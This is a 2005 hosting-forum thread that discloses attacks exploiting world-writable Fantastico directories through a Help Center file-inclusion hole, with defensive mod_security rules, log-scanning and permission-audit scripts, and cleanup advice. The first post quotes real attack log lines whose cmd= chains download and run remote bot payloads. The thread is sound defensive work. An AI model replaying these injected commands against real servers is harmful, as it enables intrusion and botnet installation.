Fantastico Issue - Improper chmod settings allow exploits to be run - READ ASAP

Discussion in 'General Discussion' started by HostMerit, Oct 20, 2005.

  1. HostMerit

    Saw files running from /var/netenberg for the 2nd or 3rd time. It seems these dirs have 777 permissions, and people are starting to mass-distribute scripts that take advantage of this security oversight:


    Code:
    root@edge [~]# cd /proc/24106
    root@edge [/proc/24106]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 19 00:15 ./
    dr-xr-xr-x  206 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:10 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 cwd -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/httpd*
    dr-x------    2 nobody   nobody          0 Oct 19 00:15 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:10 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:10 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:10 task/
    
    root@edge [/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default]# cd /proc/3222
    root@edge [/proc/3222]# ls -al
    total 0
    dr-x------    3 nobody   nobody          0 Oct 18 18:00 ./
    dr-xr-xr-x  218 root     root            0 Oct 14 12:50 ../
    dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:11 attr/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 auxv
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 cwd -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/
    -r--------    1 nobody   nobody          0 Oct 20 01:54 environ
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/eggdrop-1.6.12*
    dr-x------    2 nobody   nobody          0 Oct 18 18:00 fd/
    -r--------    1 nobody   nobody          0 Oct 20 02:11 ipaddr
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 maps
    -rw-------    1 nobody   nobody          0 Oct 20 02:11 mem
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 mounts
    -rw-r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_adj
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_score
    lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 root -> //
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
    -r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
    -r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
    dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:11 task/
    root@edge [/proc/3222]# cd /var/netenberg/fantastico_de_luxe/
    

    It appears all of these are exploitable.



    I finally traced this back to the exploitable script being used to mass-distribute it: the exploitable Help Center files (also installed by Fantastico).


    Code:
    root@edge [/usr/local/apache/domlogs]# grep "neten" xxxxxxx
    200.158.9.221 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/filesys/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:07 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/;ls%20-la HTTP/1.0" 200 5726 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:07:30 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/.var;ls%20-la HTTP/1.0" 200 3494 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:09:52 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;ls%20-la HTTP/1.0" 200 3399 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:10:09 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;mkdir%20.www HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:05 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.liquidhost.biz/call/.doc/bot.tar HTTP/1.1" 200 2809 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;tar%20-xf%20bot.tar;rm%20bot.tar HTTP/1.1" 200 2255 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:11:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3287 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:27 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.anc01.oi.com.br/mh HTTP/1.0" 200 2553 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:14:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;./httpd%20-b%20mh HTTP/1.0" 200 2695 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:43 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3532 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    200.158.9.221 - - [19/Oct/2005:00:40:49 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;mkdir%20.ani HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
    
    I would suggest, if you have not yet, that you install mod_security; this can now be done from WHM, or you can visit http://www.nuclearelephant.com/projects/mod_evasive/

    This is ESSENTIAL to any server. You can find a ruleset at www.gotroot.com, or email me at kris@hostmerit.com for the ruleset I've developed over the last year or so.

    Below are the rulesets I've developed to keep our servers secure from this security oversight. APPLY THESE MOD SECURITY RULES IMMEDIATELY.

    SecFilter "arta\.zip"
    SecFilter "cmd=cd\x20/var"
    SecFilter "master_files"
    SecFilter "HCL_path"
    SecFilter "clamav-partial"
    SecFilter "vi\.recover"
    SecFilter "netenberg"
    SecFilter "pipe\.php"
    SecFilter "cse\.gif"
    SecFilter "psybnc"
    SecFilter "fantastico_de_luxe"

    Also,

    apf -d vesgo.50megs.com
    apf -d 64.136.24.0/24

    I have no possible need for incoming packets from insecure webspace, hence I've blocked the C block it came from.


    One more thing, chances are you're already infected, multiple times.

    I would kill the /var/netenberg directory and do a fresh install.
    You can also check by running cd /var/netenberg and then find ./ -user nobody, then remove any scripts owned/modified by nobody, as all real scripts have root permissions.

    Right after, do:
    Code:
    chattr +i -R /var/netenberg/
    

    If anyone tried installing these scripts when they were hacked / had rogue files inside them (which is a very, very good chance), you just helped your client auto-install an exploit script...

    It appears Netenberg has known about this, yet is slacking on fixing it.

    Seeing as you can now run files, compile, etc., if any people have unpatched kernels there is a possibility of being rooted from this... I think it was necessary to disclose how to fix/patch this. No hate against Netenberg or Fantastico, but you must keep your server secure; I suggest you apply the above SecFilter rules in your mod_security configuration ASAP.

    -Kris

    http://www.hostmerit.com

    kris@hostmerit.com
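    As an added example (not code from the post, from Netenberg or from cPanel), the Python below scans combined-format domlog lines the way the SecFilter list above does, and decodes the cmd= parameter so the command chain can be read off the log during incident review. The log lines and hostnames in it are constructed, not taken from a real server.

```python
"""Scan Apache combined-format log lines for the Help Center / Fantastico abuse
pattern using the indicators from the thread's SecFilter rules, and decode any
cmd= value so the command chain can be read off the log. Added example."""
import re
from urllib.parse import unquote
# Indicators lifted from the SecFilter rules; mod_security 1.x matches after
# URL-decoding, so "\x20" below is a literal space. Case-insensitive regexes.
INDICATORS = [
    r"HCL_path", r"pipe\.php", r"cmd=cd\x20/var", r"master_files",
    r"netenberg", r"fantastico_de_luxe", r"cse\.gif", r"psybnc",
    r"vi\.recover", r"clamav-partial", r"arta\.zip",
    r"awstats\.pl\?(configdir|update|pluginmode)=",
]
INDICATOR_RE = re.compile("|".join(INDICATORS), re.IGNORECASE)

# host ident user [time] "method uri proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

def parse_line(line):
    m = LOG_RE.match(line)          # None for lines that are not combined format
    return m.groupdict() if m else None

def extract_cmd(raw_uri):
    # Taken from the undecoded URI so the value ends at '&' or end of request.
    m = re.search(r"[?&]cmd=([^&]+)", raw_uri)
    return unquote(m.group(1)) if m else None

def scan(lines):
    # One dict per suspicious line: host, time, status, indicators, decoded cmd.
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        decoded = unquote(rec["uri"])
        found = sorted({m.group(0).lower() for m in INDICATOR_RE.finditer(decoded)})
        if found:
            hits.append({"host": rec["host"], "time": rec["time"],
                         "status": int(rec["status"]), "indicators": found,
                         "cmd": extract_cmd(rec["uri"])})
    return hits

SAMPLE_LOG = [  # constructed lines modelled on the thread's domlog excerpt
    '203.0.113.5 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://evil.invalid/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50"',
    '203.0.113.5 - - [19/Oct/2005:00:11:05 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://evil.invalid/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://evil.invalid/bot.tar HTTP/1.1" 200 2809 "-" "Opera/8.50"',
    '198.51.100.7 - - [19/Oct/2005:00:12:00 -0400] "GET /index.php?page=contact HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["host"], h["time"], h["status"], ", ".join(h["indicators"]))
        if h["cmd"]:
            print("    cmd:", h["cmd"])
```

    A 200 status on a flagged line means the request was served, so it is the 200s, not the 403s, that need follow-up on the filesystem.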
     
  2. Izzee

    Thanks for the heads up on this one. You have been very thorough in your efforts at securing these issues.
    My servers all checked out just fine and so I have instigated your recommendations and hopefully should be secure once again, till the next hole is discovered. :rolleyes:
    The link to Got Root site has one of the best collection of modsec signature files I have ever seen. I bookmarked for a closer look later.
    Well done! :)
     
    #2 Izzee, Oct 20, 2005
    Last edited: Oct 20, 2005
  3. DigiCrime

    Have you emailed Kosmo or left a message on their board about it?
     
  5. HostMerit

    They've known for a few weeks, but haven't done anything.

    They asked for 'a few more releases to fix it',

    which I didn't deem fit.

    If anyone would like MY ruleset

    It is at http://www.hostmerit.com/modsec.user.conf

    This is assuming you used CPanel / WHM Addon Modules to install Mod_sec

    This would go in /usr/local/apache/conf/
     
  6. jackie46

    Hi, thanks for that.

    Just a quick perusal and I notice these two rules duplicated:

    SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
    SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
     
  7. dalem

    HostMerit, great post

    and great link to www.gotroot.com
    I implemented the ruleset from there and found that the blacklist.conf & blacklist2.conf were a little too restrictive
     
  8. Izzee

    From a very recent post on the Netenberg forums by Kosmo:
    Virtuozzo powered VPS disallows the use of the chattr flag.
    How will these masterfiles on a Virt. VPS be protected I wonder?
     
  9. moogle

    Will disabling or removing helpcenter resolve the issue?
    I found mine in Gallery and Zen Cart.
     
  10. HostMerit

    Any script can be exploited or installed into; it's the 777 permissions set by Fantastico on it.

    Using my new rules + other rules will block this rubbish. My ruleset has been compiled by me over the last 6+ months, with some default, some from GotRoot, and some I've found myself to work well since I've implemented it. My ruleset should not be restrictive, as it has special rules from GotRoot also to allow programs that call commands in a vulnerable way to pass through, without disabling the security module.

    I've found you can't load nearly all of GotRoot's scripts, but a lot are good for a cPanel environment. I also used to work security for a rather large web hosting company, so I know how these people think.
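    An added example, not code from the post or from Netenberg, of the two checks the thread recommends for the master_files tree: world-writable directories (the 777 permissions) and files not owned by root (the find ./ -user nobody check). It audits a constructed temporary tree instead of /var/netenberg, and the trusted uid is a parameter so the demo runs without root.

```python
"""Audit a Fantastico master_files tree for the two things the thread flags:
world-writable directories (the 777 permissions) and files whose owner is not
the trusted one (the "find ./ -user nobody" check). Added example, not from
the post; the demo builds a constructed tree instead of touching /var/netenberg."""
import os
import stat
import tempfile

def audit_tree(root, trusted_uid=0):
    """Return (world_writable_dirs, foreign_files) found under root.

    world_writable_dirs: directories any local account, including the web
    server's 'nobody', can drop files into.
    foreign_files: regular files not owned by trusted_uid (root by default);
    on a real install these are the rogue files the post says to remove."""
    writable, foreign = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            writable.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_uid != trusted_uid:
                foreign.append(path)
    return sorted(writable), sorted(foreign)

def build_demo_tree():
    """Constructed stand-in for /var/netenberg: one 777 dir with a dropped file."""
    base = tempfile.mkdtemp(prefix="netenberg_demo_")
    safe_dir = os.path.join(base, "master_files", "Drupal")
    open_dir = os.path.join(base, "master_files", "4Images_Gallery", "media")
    os.makedirs(safe_dir)
    os.makedirs(open_dir)
    for dirpath, _d, _f in os.walk(base):   # normalise regardless of umask
        os.chmod(dirpath, 0o755)
    os.chmod(open_dir, 0o777)               # the permission mistake under test
    with open(os.path.join(open_dir, "httpd"), "w") as fh:
        fh.write("# stand-in for a dropped binary\n")
    return base, open_dir

def run_demo():
    """Audit the demo tree twice: as its owner (nothing foreign) and as if the
    trusted owner were someone else, which is what root sees when files
    belong to nobody."""
    base, open_dir = build_demo_tree()
    me = os.getuid()
    return {"open_dir": open_dir,
            "dropped": os.path.join(open_dir, "httpd"),
            "as_owner": audit_tree(base, trusted_uid=me),
            "as_other": audit_tree(base, trusted_uid=me + 1)}

if __name__ == "__main__":
    r = run_demo()
    print("world-writable:", r["as_owner"][0])
    print("not owned by trusted uid:", r["as_other"][1])
```

    On a real server run it as root with the default trusted_uid=0 against /var/netenberg; the immutable flag from the chattr +i step is a separate control this audit does not check.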
     
  11. chirpy

    Although not a cPanel issue, I've made this sticky for now until netenberg release a fix.
     
  12. jackie46

    Well, I had to use HostMerit's ruleset as I was having Apache restart issues with the Apache 1.x rulesets. The rulesets I was having an issue with are

    rules.conf
    blacklist.conf

    Apache 1.x does not like something in those rulesets and I didn't bother checking any further.
     
  13. kosmo

    to all:

    Please update to Fantastico 2.10.0 r15 asap.

    kosmo
     
  14. chae

    Thank You Kosmo
     
  15. mambovince

    Any news on this?
    Can I use the WHM to update Fantastico on a Virtuozzo VPS server?

    Thanks,

    - Vince
     
  16. kosmo

    I am afraid it will not work on VPS and you have to wait for our final solution, which will be here in some days. I suggest protecting your server using mod_security as suggested earlier in this thread.

    kosmo
     
  17. jackie46

    I will wait with this update too. I don't trust that this update will not screw up something!
     
  18. HostMerit

    Once you add / install mod_security / those rules, I'd suggest you try

    http://www.yourdomain.com/?netenberg (Such as http://hostmerit.com/?netenberg)

    If you get a 403 Forbidden error, mod_security is working. If not, I would try installing from WHM if you don't know how to install from http://www.modsecurity.org/

    Also, you can feel free to email me / have me take a look.

    Hope this helps some people, as I know someone whose box was compromised due to this problem. He needed a total restore; I'm hoping you guys don't :)

    Good luck,
     
  19. jackie46

    All 10 of my boxes were clean before adding your rules, and all of them run Fantastico and phpsuexec. Not sure if running phpsuexec has stopped anyone from trying a Fantastico exploit or not. And thanks for the rules. Looking through my logs I have more people trying to compromise the box via awstats than any other.
     
  20. HostMerit

    That's another thing I would add

    SecFilterSelective THE_REQUEST "awstats\.pl\?configdir"
    SecFilterSelective REQUEST_URI "awstats\.pl\?configdir=\|"
    SecFilterSelective REQUEST_URI "awstats\.pl\?update=1\&logfile=\|"
    SecFilterSelective REQUEST_URI "awstats\.pl\?pluginmode=\:system\("
    SecFilterSelective REQUEST_URI "awstats\.pl\?(configdir|update|pluginmode)=echo"
    SecFilterSelective REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|"
    SecFilter "awstats"


    This is an older exploit, and cPanel should be the only thing accessing AWStats; Apache shouldn't.

    These rules are already in my mod_sec file, so it should already be blocking them.
     